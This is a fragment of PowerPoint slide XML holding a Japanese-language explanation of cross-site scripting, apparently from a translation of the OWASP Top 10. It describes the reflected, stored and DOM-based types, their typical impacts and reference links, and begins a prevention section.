                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>が攻撃者のウェブサイトに送信され、被害者のセッションが乗っ取られます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者は、アプリケーションが使用している自動化された</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>対策を、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>で破ることができます。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>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pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>には</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>種類のタイプが存在し、大抵は被害者のブラウザがターゲットとされます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="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a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>リフレクテッド</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションまたは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>が、ユーザ入力データを適切に検証およびエスケープせずに、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>出力の一部として含めている。攻撃が成功すると、攻撃者は被害者のブラウザで任意の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を実行できる。一般的には、ユーザは、いわゆる水飲み場サイトや広告ページなど攻撃に乗っ取られたページに辿り着くための悪質なリンクを踏むことになる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ストアド</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションまたは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>がそのデータを無害化せずに格納する。それら入力データは、後に別のユーザまたは管理者によって閲覧されることになる。ストアド</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>は、大抵の場合、高または重大リスクとみなされる。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ベース</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>フレームワーク、シングルページアプリケーション、および</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>が、攻撃者の制御可能なデータを動的に取り込んでページに出力することにより、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ベース</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>脆弱性となる。理想を言えば、アプリケーションは安全でない</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>に対して攻撃者が制御可能なデータを送信してはいけない。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>典型的な</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃には、セッションの奪取、アカウントの乗っ取り、多要素認証</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"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rPr>
              <a:t>MFA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>の回避、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ノードの置換または改竄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>トロイの木馬を介した偽のログイン画面挿入等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、悪質なソフトウェアのダウンロードやキーロギング等のユーザのブラウザに対する攻撃などが含まれます。</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Encode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Application Security Verification Standard: V5</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DOM based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XSS Filter Evasion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ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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CWE-79: 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5"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を防止するには、信頼できないデータを動的なブラウザコンテンツから区別する必要があります。以下を実施します</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 最新の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ruby on Rails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>React JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>など、</a:t>
            </a:r>
            <a:r>
